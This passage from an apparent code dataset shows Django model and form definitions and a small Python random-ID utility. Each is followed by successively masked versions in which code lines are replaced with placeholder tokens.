models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n\n\nclass Person(models.Model):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n def __str__(self):\n return str(self.nickname) + ' ' + self.last_name + '' + self.first_name\n\n\nclass Contact_type(models.Model):\n id_contact_type = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n validation_regexp = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.\n PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n\n\nclass Person(models.Model):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n\n\nclass Contact_type(models.Model):\n id_contact_type = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n validation_regexp = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = 
models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.\n PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n\n\nclass Contact_type(models.Model):\n id_contact_type = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n validation_regexp = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.\n PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, 
on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n\n\nclass Contact_type(models.Model):\n <assignment token>\n <assignment token>\n <assignment token>\n\n def __str__(self):\n return str(self.name)\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.\n PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n\n\nclass Contact_type(models.Model):\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.\n PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n 
self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n<class token>\n\n\nclass Contact(models.Model):\n id_contact = models.AutoField(primary_key=True)\n id_person = models.ForeignKey(Person, on_delete=models.PROTECT)\n id_contact_type = models.ForeignKey(Contact_type, on_delete=models.\n PROTECT, null=True)\n contact = models.CharField(max_length=100, null=True)\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n<class token>\n\n\nclass Contact(models.Model):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n def __str__(self):\n return str(self.id_person) + ' ' + str(self.contact)\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = 
models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n<class token>\n\n\nclass Contact(models.Model):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass Relation_type(models.Model):\n id_relation = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100)\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass Relation_type(models.Model):\n <assignment token>\n <assignment token>\n\n def __str__(self):\n return str(self.name)\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = 
models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass Relation_type(models.Model):\n <assignment token>\n <assignment token>\n <function token>\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass Relation(models.Model):\n id_relation = models.AutoField(primary_key=True)\n id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who1')\n id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,\n related_name='who2')\n description = models.CharField(max_length=100, null=True)\n id_relation_type = models.ForeignKey(Relation_type, on_delete=models.\n CASCADE)\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass Relation(models.Model):\n <assignment token>\n <assignment token>\n <assignment 
token>\n <assignment token>\n <assignment token>\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass Meeting(models.Model):\n id_meeting = models.AutoField(primary_key=True)\n start_date = models.DateField(max_length=100)\n start_time = models.TimeField(max_length=100)\n description = models.CharField(max_length=100, null=True, default='')\n duration = models.DurationField(default=0)\n id_location = models.ForeignKey(Location, on_delete=models.CASCADE)\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass Meeting(models.Model):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n def __str__(self):\n return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(\n self.duration) + ' ' + str(self.description) + ' ' + str(self.\n id_location)\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass Meeting(models.Model):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass Person_meeting(models.Model):\n id_person = models.ForeignKey(Person, on_delete=models.CASCADE)\n id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,\n unique=False)\n", "<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass Person_meeting(models.Model):\n <assignment token>\n <assignment token>\n", "<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n" ]
false
87
cdbf9427d48f0a5c53b6efe0de7dfea65a8afd83
# -*- coding: utf-8 -*-
# Copyright (c) 2018-2020 Christiaan Frans Rademan <[email protected]>.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
import os
import random
import string

# Use cryptographic-safe random generator as provided by the OS.
random_generator = random.SystemRandom()


def string_id(length=8):
    """ Generate Random ID.

    Random ID contains ascii letters and digits.

    Args:
        length (int): Character length of id.

    Returns:
        Random id string.
    """
    return ''.join(random.choice(string.ascii_letters +
                                 string.digits)
                   for _ in range(length))


# Request ID Counter
####################

req_c = None
pid = None


def request_id():
    # Using random is pretty slow. This is way quicker.
    # It uses a cached proc id. Then it only appends a counter
    # per request...
    #
    # It may not be as unique, but highly unlikely to collide
    # with recent request ids.
    global req_c, pid

    if req_c is None:
        req_c = random.randint(1000*1000, 1000*1000*1000)

    if pid is None:
        pid = str(os.getpid())

    req_id = req_c = req_c + 1
    req_id = hex(req_id)[2:].zfill(8)[-8:]

    return pid + '-' + req_id
[ "# -*- coding: utf-8 -*-\n# Copyright (c) 2018-2020 Christiaan Frans Rademan <[email protected]>.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# * Neither the name of the copyright holders nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF\n# THE POSSIBILITY OF SUCH DAMAGE.\nimport os\nimport random\nimport string\n\n# Use cryptographic-safe random generator as provided by the OS.\nrandom_generator = random.SystemRandom()\n\n\ndef string_id(length=8):\n \"\"\" Generate Random ID.\n\n Random ID contains ascii letters and digitis.\n\n Args:\n length (int): Character length of id.\n\n Returns:\n Random id string.\n \"\"\"\n return ''.join(random.choice(string.ascii_letters +\n string.digits)\n for _ in range(length))\n\n\n# Request ID Counter\n####################\n\nreq_c = None\npid = None\n\n\ndef request_id():\n # Using random is pretty slow. This is way quicker.\n # It uses cached proc id. 
Then it only appends a counter\n # per request...\n #\n # It may not be as unique, but highly unlikely to collide\n # with recent request ids.\n global req_c, pid\n\n if req_c is None:\n req_c = random.randint(1000*1000, 1000*1000*1000)\n\n if pid is None:\n pid = str(os.getpid())\n\n req_id = req_c = req_c + 1\n req_id = hex(req_id)[2:].zfill(8)[-8:]\n\n return pid + '-' + req_id\n", "import os\nimport random\nimport string\nrandom_generator = random.SystemRandom()\n\n\ndef string_id(length=8):\n \"\"\" Generate Random ID.\n\n Random ID contains ascii letters and digits.\n\n Args:\n length (int): Character length of id.\n\n Returns:\n Random id string.\n \"\"\"\n return ''.join(random.choice(string.ascii_letters + string.digits) for\n _ in range(length))\n\n\nreq_c = None\npid = None\n\n\ndef request_id():\n global req_c, pid\n if req_c is None:\n req_c = random.randint(1000 * 1000, 1000 * 1000 * 1000)\n if pid is None:\n pid = str(os.getpid())\n req_id = req_c = req_c + 1\n req_id = hex(req_id)[2:].zfill(8)[-8:]\n return pid + '-' + req_id\n", "<import token>\nrandom_generator = random.SystemRandom()\n\n\ndef string_id(length=8):\n \"\"\" Generate Random ID.\n\n Random ID contains ascii letters and digits.\n\n Args:\n length (int): Character length of id.\n\n Returns:\n Random id string.\n \"\"\"\n return ''.join(random.choice(string.ascii_letters + string.digits) for\n _ in range(length))\n\n\nreq_c = None\npid = None\n\n\ndef request_id():\n global req_c, pid\n if req_c is None:\n req_c = random.randint(1000 * 1000, 1000 * 1000 * 1000)\n if pid is None:\n pid = str(os.getpid())\n req_id = req_c = req_c + 1\n req_id = hex(req_id)[2:].zfill(8)[-8:]\n return pid + '-' + req_id\n", "<import token>\n<assignment token>\n\n\ndef string_id(length=8):\n \"\"\" Generate Random ID.\n\n Random ID contains ascii letters and digits.\n\n Args:\n length (int): Character length of id.\n\n Returns:\n Random id string.\n \"\"\"\n return ''.join(random.choice(string.ascii_letters + string.digits) for\n _ in range(length))\n\n\n<assignment token>\n\n\ndef request_id():\n global req_c, pid\n if req_c is None:\n req_c = random.randint(1000 * 1000, 1000 * 1000 * 1000)\n if pid is None:\n pid = str(os.getpid())\n req_id = req_c = req_c + 1\n req_id = hex(req_id)[2:].zfill(8)[-8:]\n return pid + '-' + req_id\n", "<import token>\n<assignment token>\n<function token>\n<assignment token>\n\n\ndef request_id():\n global req_c, pid\n if req_c is None:\n req_c = random.randint(1000 * 1000, 1000 * 1000 * 1000)\n if pid is None:\n pid = str(os.getpid())\n req_id = req_c = req_c + 1\n req_id = hex(req_id)[2:].zfill(8)[-8:]\n return pid + '-' + req_id\n", "<import token>\n<assignment token>\n<function token>\n<assignment token>\n<function token>\n" ]
false
88
c4624425f57211e583b5fbaec3943539ce6fea6f
from django import forms from . models import BlogPost class BlogPostForm(forms.ModelForm): class Meta: model = BlogPost fields = '__all__'
[ "from django import forms\nfrom . models import BlogPost\n\nclass BlogPostForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = BlogPost\n\t\tfields = '__all__'", "from django import forms\nfrom .models import BlogPost\n\n\nclass BlogPostForm(forms.ModelForm):\n\n\n class Meta:\n model = BlogPost\n fields = '__all__'\n", "<import token>\n\n\nclass BlogPostForm(forms.ModelForm):\n\n\n class Meta:\n model = BlogPost\n fields = '__all__'\n", "<import token>\n<class token>\n" ]
false
89
a42f36fca2f65d0c5c9b65055af1814d8b4b3d42
